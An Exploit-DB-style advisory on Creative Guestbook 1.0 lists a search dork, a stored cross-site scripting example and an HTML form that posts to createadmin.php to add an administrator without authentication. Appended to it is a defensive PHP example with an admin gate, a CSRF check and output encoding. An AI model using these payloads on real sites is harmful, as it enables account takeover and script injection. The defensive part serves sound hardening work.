Creative Guestbook 1.0 - Multiple Vulnerabilities
Author: Dj7xpl
type: webapps
platform: php
date_added: 2007-03-14
verified: 1
codes: OSVDB-34234;CVE-2007-1480;OSVDB-34233;CVE-2007-1479
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
# Portal : Creative Guestbook 1.0
# Download : http://www.thecreativeheads.de/CreativeFiles/downloads.php
# Author : Dj7xpl | Dj7xpl@yahoo.com
# Dork : "Creative Guestbook"
# Class : (Add Remote Admin User) And (Cross Site Scripting)
#
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
#
#
# css/xss :
# http://[Target]/[Path]/Guestbook.php <== Insert Your Script
# Example : <script> alert (' dj7xpl ^_^ ') </script>
#
#
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
#
#
# Add Remote Admin User :
#
# <form name="admin" method="post" action="http://[target]/[path]/createadmin.php?PHPSESSID='.session_id().'">
# <input type="text" name="Name" value="name"><br>
# <input type="text" name="Email" value="email"><br>
# <input type="text" name="PASSWORD" value="password"><br>
# <input type="submit" value="Admin hinzufügen" name="submit">
# </form>
#
#
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
#
#
# Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+
# milw0rm.com [2007-03-15]
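
A defensive counterpart to the two issues above, added here as an example and not taken from the advisory or from Creative Guestbook's code. It assumes createadmin.php creates the account without checking who is calling and that guestbook fields are echoed unencoded; the session keys, the csrf field and the 12-character password minimum are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example, not Creative Guestbook's code. Assumed (hypothetical) names:
// $_SESSION keys 'is_admin' and 'csrf', and a hidden POST field 'csrf'.

// Gate for an admin-creation endpoint: returns the HTTP status to send.
function authorize_admin_creation(array $session, array $post, string $method): int
{
    if ($method !== 'POST') {
        return 405;                      // state changes only via POST
    }
    if (empty($session['is_admin'])) {
        return 403;                      // caller is not a logged-in admin
    }
    $expected = $session['csrf'] ?? '';
    $given    = $post['csrf'] ?? '';
    if (!is_string($expected) || !is_string($given) || $expected === ''
        || !hash_equals($expected, $given)) {
        return 403;                      // missing or forged request token
    }
    return 200;
}

// Validate the fields the advisory's form posts (Name, Email, PASSWORD).
function validate_admin_fields(array $post): ?array
{
    $name     = $post['Name'] ?? '';
    $password = $post['PASSWORD'] ?? '';
    $email    = filter_var($post['Email'] ?? '', FILTER_VALIDATE_EMAIL);
    if (!is_string($name) || !is_string($password) || $email === false
        || trim($name) === '' || strlen($password) < 12) { // assumed minimum
        return null;
    }
    return ['name' => trim($name), 'email' => $email,
            'hash' => password_hash($password, PASSWORD_DEFAULT)];
}

// Encode guestbook fields on output so stored markup is displayed as text.
function render_entry(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input: the advisory's POST with no admin session.
$post = ['Name' => 'name', 'Email' => 'email', 'PASSWORD' => 'password'];
echo authorize_admin_creation([], $post, 'POST'), "\n";
var_dump(validate_admin_fields($post));
echo render_entry("<script> alert (' dj7xpl ^_^ ') </script>"), "\n";
```

The gate belongs at the top of the endpoint, before any database write; the encoder applies wherever a stored entry is written into HTML.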